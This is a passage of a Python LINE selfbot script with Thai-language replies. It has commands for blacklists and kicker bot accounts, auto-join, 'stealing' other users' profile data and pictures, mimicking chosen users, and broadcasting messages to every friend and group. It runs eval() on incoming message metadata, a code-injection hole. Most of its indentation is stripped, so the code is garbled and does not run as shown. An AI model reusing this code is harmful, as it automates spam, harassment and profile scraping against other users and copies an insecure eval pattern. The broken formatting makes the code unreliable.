line.sendMessage(msg.to, "「STATUS PROTECT JS」\n" + msgs)
elif ("ส่อง " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = line.getContact(key1)
line.sendMessage(msg.to, "ชื่อ : "+str(mi.displayName)+"\nMID : " +key1)
line.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
line.sendMessage(msg.to,"เพิ่มบัญชีดำสำเร็จแล้ว")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
line.sendMessage(msg.to,"ลบบัญชีดำสำเร็จแล้ว")
except:
pass
elif cmd == "ban":
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
line.sendMessage(to,"Send contact you will be blacklist")
elif cmd == "unban":
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
line.sendMessage(to,"Send contact you will be whitelist")
elif cmd == "bc":
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
line.sendMessage(msg.to,"ไม่พบคนติดดำ")
else:
ma = ""
for i in wait["blacklist"]:
ma = line.getContact(i)
line.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "cb":
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = line.getContacts(wait["blacklist"])
mc = "「%i」User Blacklist" % len(ragets)
line.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker2.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker3.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker4.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker5.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker6.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker7.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker8.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker9.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker10.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
elif cmd.startswith('error'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Error 」'
res += '\n├ Usage : '
res += '\n│ • {key}Error'
res += '\n│ • {key}Error Logs'
res += '\n│ • {key}Error Reset'
res += '\n│ • {key}Error Detail <errid>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'error':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cond[0].lower() == 'logs':
try:
filee = open('errorLog.txt', 'r')
except FileNotFoundError:
return line.sendMessage(to, 'ไม่สามารถแสดงบันทึกข้อผิดพลาดได้\nไม่พบไฟล์')
errors = [err.strip() for err in filee.readlines()]
filee.close()
if not errors: return line.sendMessage(to, 'ไม่สามารถแสดงบันทึกข้อผิดพลาดได้\nบันทึกข้อผิดพลาดว่างเปล่า')
res = '╭───「 Error Logs 」'
res += '\n├ List :'
parsed_len = len(errors)//200+1
no = 0
for point in range(parsed_len):
for error in errors[point*200:(point+1)*200]:
if not error: continue
no += 1
res += '\n│ %i. %s' % (no, error)
if error == errors[-1]:
res += '\n╰───「SelfBot ProtectV2.2」'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
elif cond[0].lower() == 'reset':
filee = open('errorLog.txt', 'w')
filee.write('')
filee.close()
shutil.rmtree('tmp/errors/', ignore_errors=True)
os.system('mkdir tmp/errors')
line.sendMessage(to, 'Success reset error logs')
elif cond[0].lower() == 'detail':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
errid = cond[1]
if os.path.exists('tmp/errors/%s.txt' % errid):
with open('tmp/errors/%s.txt' % errid, 'r') as f:
line.sendMessage(to, f.read())
else:
return line.sendMessage(to, 'Failed display details error, errorid not valid')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif txt.startswith('setkey'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Setting Key 」'
res += '\n├ Status : ' + bool_dict[settings['setKey']['status']][1]
res += '\n├ Key : ' + settings['setKey']['key'].title()
res += '\n├ Usage : '
res += '\n│ • Setkey'
res += '\n│ • Setkey <on/off>'
res += '\n│ • Setkey <key>'
res += '\n╰───「SelfBot ProtectV2.2」'
if txt == 'setkey':
line.sendMessage(to, parsingRes(res))
elif texttl == 'on':
if settings['setKey']['status']:
line.sendMessage(to, 'Failed activate setkey, setkey already active')
else:
settings['setKey']['status'] = True
line.sendMessage(to, 'Success activated setkey')
elif texttl == 'off':
if not settings['setKey']['status']:
line.sendMessage(to, 'Failed deactivate setkey, setkey already deactive')
else:
settings['setKey']['status'] = False
line.sendMessage(to, 'Success deactivated setkey')
else:
settings['setKey']['key'] = texttl
line.sendMessage(to, 'Success change set key to (%s)' % textt)
elif cmd.startswith('autoadd'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Auto Add 」'
res += '\n├ Status : ' + bool_dict[settings['autoAdd']['status']][1]
res += '\n├ Reply : ' + bool_dict[settings['autoAdd']['reply']][0]
res += '\n├ Reply Message : ' + settings['autoAdd']['message']
res += '\n├ Usage : '
res += '\n│ • {key}AutoAdd'
res += '\n│ • {key}AutoAdd <on/off>'
res += '\n│ • {key}AutoAdd Reply <on/off>'
res += '\n│ • {key}AutoAdd <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'autoadd':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoAdd']['status']:
line.sendMessage(to, 'เปิดรับแอดออโต้')
else:
settings['autoAdd']['status'] = True
line.sendMessage(to, 'เปิดรับแอดออโต้')
elif texttl == 'off':
if not settings['autoAdd']['status']:
line.sendMessage(to, 'ปิดรับแอดออโต้')
else:
settings['autoAdd']['status'] = False
line.sendMessage(to, 'ปิดรับแอดออโต้')
elif cond[0].lower() == 'reply':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
if cond[1].lower() == 'on':
if settings['autoAdd']['reply']:
line.sendMessage(to, 'เปิดข้อความทักคนแอด')
else:
settings['autoAdd']['reply'] = True
line.sendMessage(to, 'เปิดข้อความทักคนแอด')
elif cond[1].lower() == 'off':
if not settings['autoAdd']['reply']:
line.sendMessage(to, 'ปิดข้อความทักคนแอด')
else:
settings['autoAdd']['reply'] = False
line.sendMessage(to, 'ปิดข้อความทักคนแอด')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
settings['autoAdd']['message'] = textt
line.sendMessage(to, 'เปลี่ยนข้อความออโต้แอดเป็น `%s`' % textt)
elif cmd.startswith('autojoin'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Auto Join 」'
res += '\n├ Status : ' + bool_dict[settings['autoJoin']['status']][1]
res += '\n├ Reply : ' + bool_dict[settings['autoJoin']['reply']][0]
res += '\n├ Reply Message : ' + settings['autoJoin']['message']
res += '\n├ Usage : '
res += '\n│ • {key}AutoJoin'
res += '\n│ • {key}AutoJoin <on/off>'
res += '\n│ • {key}AutoJoin Ticket <on/off>'
res += '\n│ • {key}AutoJoin Reply <on/off>'
res += '\n│ • {key}AutoJoin <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'autojoin':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoJoin']['status']:
line.sendMessage(to, 'เปิดเข้าร่วมกลุ่มออโต้')
else:
settings['autoJoin']['status'] = True
line.sendMessage(to, 'เปิดเข้าร่วมกลุ่มออโต้')
elif texttl == 'off':
if not settings['autoJoin']['status']:
line.sendMessage(to, 'ปิดเข้าร่วมกลุ่มออโต้')
else:
settings['autoJoin']['status'] = False
line.sendMessage(to, 'ปิดเข้าร่วมกลุ่มออโต้')
elif cond[0].lower() == 'reply':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
if cond[1].lower() == 'on':
if settings['autoJoin']['reply']:
line.sendMessage(to, 'เปิดความทักคนเชิญเข้ากลุ่ม')
else:
settings['autoJoin']['reply'] = True
line.sendMessage(to, 'เปิดความทักคนเชิญเข้ากลุ่ม')
elif cond[1].lower() == 'off':
if not settings['autoJoin']['reply']:
line.sendMessage(to, 'ปิดความทักคนเชิญเข้ากลุ่ม')
else:
settings['autoJoin']['reply'] = False
line.sendMessage(to, 'ปิดความทักคนเชิญเข้ากลุ่ม')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cond[0].lower() == 'ticket':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
if cond[1].lower() == 'on':
if settings['autoJoin']['ticket']:
line.sendMessage(to, 'เปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
else:
settings['autoJoin']['ticket'] = True
line.sendMessage(to, 'เปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
elif cond[1].lower() == 'off':
if not settings['autoJoin']['ticket']:
line.sendMessage(to, 'ปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
else:
settings['autoJoin']['ticket'] = False
line.sendMessage(to, 'ปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
settings['autoJoin']['message'] = textt
line.sendMessage(to, 'ข้อความทักคนเชิญเข้ากลุ่มเปลี่ยนเป็น `%s`' % textt)
elif cmd.startswith('autorespondmention'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Auto Respond 」'
res += '\n├ Status : ' + bool_dict[settings['autoRespondMention']['status']][1]
res += '\n├ Reply Message : ' + settings['autoRespondMention']['message']
res += '\n├ Usage : '
res += '\n│ • {key}AutoRespondMention'
res += '\n│ • {key}AutoRespondMention <on/off>'
res += '\n│ • {key}AutoRespondMention <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'autorespondmention':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoRespondMention']['status']:
line.sendMessage(to, 'เปิดตอบกลับคนแทค')
else:
settings['autoRespondMention']['status'] = True
line.sendMessage(to, 'เปิดตอบกลับคนแทค')
elif texttl == 'off':
if not settings['autoRespondMention']['status']:
line.sendMessage(to, 'ปิดตอบกลับคนแทค')
else:
settings['autoRespondMention']['status'] = False
line.sendMessage(to, 'ปิดตอบกลับคนแทค')
else:
settings['autoRespondMention']['message'] = textt
line.sendMessage(to, 'ข้อความตอบกลับคนแทคเปลี่ยนเป็น `%s`' % textt)
elif cmd.startswith('autorespond'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Auto Respond 」'
res += '\n├ Status : ' + bool_dict[settings['autoRespond']['status']][1]
res += '\n├ Reply Message : ' + settings['autoRespond']['message']
res += '\n├ Usage : '
res += '\n│ • {key}AutoRespond'
res += '\n│ • {key}AutoRespond <on/off>'
res += '\n│ • {key}AutoRespond <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'autorespond':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoRespond']['status']:
line.sendMessage(to, 'เปิดตอบกลับอัตโนมัติ')
else:
settings['autoRespond']['status'] = True
line.sendMessage(to, 'เปิดตอบกลับอัตโนมัติ')
elif texttl == 'off':
if not settings['autoRespond']['status']:
line.sendMessage(to, 'ปิดตอบกลับอัตโนมัติ')
else:
settings['autoRespond']['status'] = False
line.sendMessage(to, 'ปิดตอบกลับอัตโนมัติ')
else:
settings['autoRespond']['message'] = textt
line.sendMessage(to, 'ข้อความเปิดตอบกลับอัตโนมัติถูกเปลี่ยนเป็น `%s`' % textt)
elif cmd.startswith('autoread '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['autoRead']:
line.sendMessage(to, 'เปิดอ่านออโต้')
else:
settings['autoRead'] = True
line.sendMessage(to, 'เปิดอ่านออโต้')
elif texttl == 'off':
if not settings['autoRead']:
line.sendMessage(to, 'ปิดอ่านออโต้')
else:
settings['autoRead'] = False
line.sendMessage(to, 'ปิดอ่านออโต้')
elif cmd.startswith('checkcontact '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['checkContact']:
line.sendMessage(to, 'เปิดเช็คคท')
else:
settings['checkContact'] = True
line.sendMessage(to, 'เปิดเช็คคท')
elif texttl == 'off':
if not settings['checkContact']:
line.sendMessage(to, 'ปิดเช็คคท')
else:
settings['checkContact'] = False
line.sendMessage(to, 'ปิดเช็คคท')
elif cmd.startswith('checkpost '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['checkPost']:
line.sendMessage(to, 'เปิดเช็คโพส')
else:
settings['checkPost'] = True
line.sendMessage(to, 'เปิดเช็คโพส')
elif texttl == 'off':
if not settings['checkPost']:
line.sendMessage(to, 'ปิดเช็คโพส')
else:
settings['checkPost'] = False
line.sendMessage(to, 'ปิดเช็คโพส')
elif cmd.startswith('checksticker '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['checkSticker']:
line.sendMessage(to, 'เปิดเช็คสติ๊กเกอร์')
else:
settings['checkSticker'] = True
line.sendMessage(to, 'เปิดเช็คสติ๊กเกอร์')
elif texttl == 'off':
if not settings['checkSticker']:
line.sendMessage(to, 'ปิดเช็คสติ๊กเกอร์')
else:
settings['checkSticker'] = False
line.sendMessage(to, 'ปิดเช็คสติ๊กเกอร์')
elif cmd.startswith('myprofile'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
profile = line.getProfile()
res = '╭───「 My Profile 」'
res += '\n├ MID : ' + profile.mid
res += '\n├ Display Name : ' + str(profile.displayName)
res += '\n├ Usage : '
res += '\n│ • {key}MyProfile'
res += '\n│ • {key}MyProfile MID'
res += '\n│ • {key}MyProfile Name'
res += '\n│ • {key}MyProfile Bio'
res += '\n│ • {key}MyProfile Pict'
res += '\n│ • {key}MyProfile Cover'
res += '\n│ • {key}MyProfile Change Name <name>'
res += '\n│ • {key}MyProfile Change Bio <bio>'
res += '\n│ • {key}MyProfile Change Pict'
res += '\n│ • {key}MyProfile Change Cover'
res += '\n╰───「SelfBot ProtectV2.2」'
if texttl == 'mid':
line.sendMessage(to, '「 MID 」\n' + str(profile.mid))
elif texttl == 'name':
line.sendMessage(to, '「 Display Name 」\n' + str(profile.displayName))
elif texttl == 'bio':
line.sendMessage(to, '「 Status Message 」\n' + str(profile.statusMessage))
elif texttl == 'pict':
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
line.sendMessage(to, '「 Picture Status 」\n' + path)
else:
line.sendMessage(to, 'ไม่สามารถแสดงรูปได้เนื่องจากผู้ใช้นี้ไม่ได้ใส่รูป')
elif texttl == 'cover':
cover = line.getProfileCoverURL(profile.mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, '「 Cover Picture 」\n' + str(cover))
elif texttl.startswith('change '):
texts = textt[7:]
textsl = texts.lower()
if textsl.startswith('name '):
name = texts[5:]
if len(name) <= 20:
profile.displayName = name
line.updateProfile(profile)
line.sendMessage(to, 'เปลี่ยนชื่อสำเร็จ\nเปลี่ยนชื่อเป็น`%s`' % name)
else:
line.sendMessage(to, 'ไม่สามารถเปลี่ยนชื่อได้\nความยาวของชื่อต้องไม่เกิน 20')
elif textsl.startswith('bio '):
bio = texts[4:]
if len(bio) <= 3000:
profile.statusMessage = bio
line.updateProfile(profile)
                            line.sendMessage(to, 'เปลี่ยนสถานะเรียบร้อย\nเปลี่ยนสถานะเป็น `%s`' % bio)
else:
line.sendMessage(to, 'ไม่สามารถเปลี่ยนสถานะได้\nความยาวของข้อความสถานะต้องไม่เกิน3000')
elif textsl == 'pict':
settings['changePictureProfile'] = True
line.sendMessage(to, 'กรุณาส่งภาพเพื่อเปลี่ยนรูปโปรไฟล์, พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
elif textsl == 'cover':
settings['changeCoverProfile'] = True
line.sendMessage(to, 'กรุณาส่งภาพเพื่อเปลี่ยนรูปปก, พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('profile'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
profile = line.getContact(to) if msg.toType == 0 else None
res = '╭───「 My Profile 」'
if profile:
res += '\n├ MID : ' + profile.mid
res += '\n├ Display Name : ' + str(profile.displayName)
if profile.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(profile.displayNameOverridden)
res += '\n├ Status Message : ' + str(profile.statusMessage)
res += '\n├ Usage : '
res += '\n│ • {key}Profile'
res += '\n│ • {key}Profile Mid'
res += '\n│ • {key}Profile Name'
res += '\n│ • {key}Profile Bio'
res += '\n│ • {key}Profile Pict'
res += '\n│ • {key}Profile Cover'
res += '\n│ • {key}Profile Steal Profile <mention>'
res += '\n│ • {key}Profile Steal Mid <mention>'
res += '\n│ • {key}Profile Steal Name <mention>'
res += '\n│ • {key}Profile Steal Bio <mention>'
res += '\n│ • {key}Profile Steal Pict <mention>'
res += '\n│ • {key}Profile Steal Cover <mention>'
res += '\n╰───「SelfBot ProtectV2.2」'
if texttl == 'mid':
if msg.toType != 0: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น')
line.sendMessage(to, '「 MID 」\n' + str(profile.mid))
elif texttl == 'name':
if msg.toType != 0: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น')
line.sendMessage(to, '「 Display Name 」\n' + str(profile.displayName))
elif texttl == 'bio':
if msg.toType != 0: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น')
line.sendMessage(to, '「 Status Message 」\n' + str(profile.statusMessage))
elif texttl == 'pict':
if msg.toType != 0: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น')
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
line.sendMessage(to, '「 Picture Status 」\n' + path)
else:
line.sendMessage(to, 'ไม่สามารถแสดงรูปได้เนื่องจากผู้ใช้นี้ไม่ได้ใส่รูป')
elif texttl == 'cover':
if msg.toType != 0: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น')
cover = line.getProfileCoverURL(profile.mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, '「 Cover Picture 」\n' + str(cover))
elif texttl.startswith('steal '):
texts = textt[6:]
textsl = texts.lower()
if textsl.startswith('profile '):
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
profile = line.getContact(mention['M'])
if profile.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + profile.pictureStatus)
cover = line.getProfileCoverURL(profile.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Profile 」'
res += '\n├ MID : ' + profile.mid
res += '\n├ Display Name : ' + str(profile.displayName)
if profile.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(profile.displayNameOverridden)
res += '\n├ Status Message : ' + str(profile.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงรูปโปรไฟล์ได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('mid '):
res = '╭───「 MID 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
mid = mentions['MENTIONEES'][0]['M']
return line.sendMessage(to, '「 MID 」\n' + mid)
for mention in mentions['MENTIONEES']:
mid = mention['M']
no += 1
res += '\n│ %i. %s' % (no, mid)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงmidได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('name '):
res = '╭───「 Display Name 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
profile = line.getContact(mentions['MENTIONEES'][0]['M'])
return line.sendMessage(to, '「 Display Name 」\n' + str(profile.displayName))
for mention in mentions['MENTIONEES']:
mid = mention['M']
profile = line.getContact(mid)
no += 1
res += '\n│ %i. %s' % (no, profile.displayName)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงชื่อได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('bio '):
res = '╭───「 Status Message 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
profile = line.getContact(mentions['MENTIONEES'][0]['M'])
return line.sendMessage(to, '「 Status Message 」\n' + str(profile.statusMessage))
for mention in mentions['MENTIONEES']:
mid = mention['M']
profile = line.getContact(mid)
no += 1
res += '\n│ %i. %s' % (no, profile.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงสถานะได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('pict '):
res = '╭───「 Picture Status 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
profile = line.getContact(mentions['MENTIONEES'][0]['M'])
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
return line.sendMessage(to, '「 Picture Status 」\n' + path)
else:
                                        return line.sendMessage(to, 'ไม่สามารถดึงรูปได้, บุคคลนี้ `%s` ไม่ได้ใส่รูปภาพโปรไฟล์' % profile.displayName)
for mention in mentions['MENTIONEES']:
mid = mention['M']
profile = line.getContact(mid)
no += 1
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
res += '\n│ %i. %s' % (no, path)
else:
res += '\n│ %i. Not Found' % no
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงรูปได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('cover '):
res = '╭───「 Cover Picture 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
mid = mentions['MENTIONEES'][0]['M']
cover = line.getProfileCoverURL(mid)
line.sendImageWithURL(to, str(cover))
                                return line.sendMessage(to, '「 Cover Picture 」\n' + str(cover))  # return so the single-mention case is not sent again by the loop below
for mention in mentions['MENTIONEES']:
mid = mention['M']
no += 1
cover = line.getProfileCoverURL(mid)
line.sendImageWithURL(to, str(cover))
res += '\n│ %i. %s' % (no, cover)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงปกได้, กรุณาแทคผู้ใช้ด้วย')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
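            # mimic: maintains a per-mid on/off map in settings['mimic']['target']; when enabled,
            # messages from those mids are presumably echoed back by the receiver loop elsewhere in the script.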
elif cmd.startswith('mimic'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
targets = ''
if settings['mimic']['target']:
no = 0
for target, status in settings['mimic']['target'].items():
no += 1
try:
name = line.getContact(target).displayName
except TalkException:
name = 'Unknown'
targets += '\n│ %i. %s//%s' % (no, name, bool_dict[status][1])
else:
targets += '\n│ Nothing'
res = '╭───「 Mimic 」'
res += '\n├ Status : ' + bool_dict[settings['mimic']['status']][1]
res += '\n├ List :'
res += targets
res += '\n├ Usage : '
res += '\n│ • {key}Mimic'
res += '\n│ • {key}Mimic <on/off>'
res += '\n│ • {key}Mimic Reset'
res += '\n│ • {key}Mimic Add <mention>'
res += '\n│ • {key}Mimic Del <mention>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'mimic':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['mimic']['status']:
line.sendMessage(to, 'เริ่มการล้อเลียน')
else:
settings['mimic']['status'] = True
line.sendMessage(to, 'เริ่มการล้อเลียน')
elif texttl == 'off':
if not settings['mimic']['status']:
line.sendMessage(to, 'ยกเลิกการล้อเลียน')
else:
settings['mimic']['status'] = False
line.sendMessage(to, 'ยกเลิกการล้อเลียน')
elif texttl == 'reset':
settings['mimic']['target'] = {}
line.sendMessage(to, 'รีเช็ตรายชื่อที่จะล้อเลี่ยนเรียบร้อย')
elif texttl.startswith('add '):
res = '╭───「 Mimic 」'
res += '\n├ Status : Add Target'
res += '\n├ Added :'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
settings['mimic']['target'][mid] = True
no += 1
try:
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'ไม่สามารถเพื่มรายชื่อได้, กรุณาแทคผู้ใช้ด้วย')
elif texttl.startswith('del '):
res = '╭───「 Mimic 」'
res += '\n├ Status : Del Target'
res += '\n├ Deleted :'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid in settings['mimic']['target']:
settings['mimic']['target'][mid] = False
no += 1
try:
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'ไม่สามารถลบรายชื่อได้, กรุณาแทคผู้ใช้ด้วย')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
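            # broadcast: sends <message> to every friend (type 1), every joined group (type 2),
            # or both (type 0), sleeping 0.8 s between sends to stay under rate limits.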
elif cmd.startswith('broadcast'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Broadcast 」'
res += '\n├ Broadcast Type : '
res += '\n│ 1 : Friends'
res += '\n│ 2 : Groups'
res += '\n│ 0 : All'
res += '\n├ Usage : '
res += '\n│ • {key}Broadcast'
res += '\n│ • {key}Broadcast <type> <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'broadcast':
line.sendMessage(to, parsingRes(res).format(key=setKey.title()))
elif cond[0] == '1':
if len(cond) < 2:
return line.sendMessage(to, 'ไม่สามารถประกาศได้, ไม่พบข้อความ')
res = '「 Broadcast 」\n'
res += textt[2:]
res += '\n\n「SelfBot ProtectV2.2」'
targets = line.getAllContactIds()
                    for target in list(targets):  # iterate over a copy; failed targets are removed from the list below
try:
line.sendMessage(target, res)
except TalkException:
targets.remove(target)
continue
time.sleep(0.8)
line.sendMessage(to, 'ประกาศเรียบร้อย, จำนวน %i คน' % len(targets))
elif cond[0] == '2':
if len(cond) < 2:
return line.sendMessage(to, 'ไม่สามารถประกาศได้, ไม่พบข้อความ')
res = '「 Broadcast 」\n'
res += textt[2:]
res += '\n\n「SelfBot ProtectV2.2」'
targets = line.getGroupIdsJoined()
                    for target in list(targets):  # iterate over a copy; failed targets are removed from the list below
try:
line.sendMessage(target, res)
except TalkException:
targets.remove(target)
continue
time.sleep(0.8)
line.sendMessage(to, 'ประกาศเรียบร้อย, จำนวน %i กลุ่ม' % len(targets))
elif cond[0] == '0':
if len(cond) < 2:
return line.sendMessage(to, 'ไม่สามารถประกาศได้, ไม่พบข้อความ')
res = '「 Broadcast 」\n'
res += textt[2:]
res += '\n\n「SelfBot ProtectV2.2」'
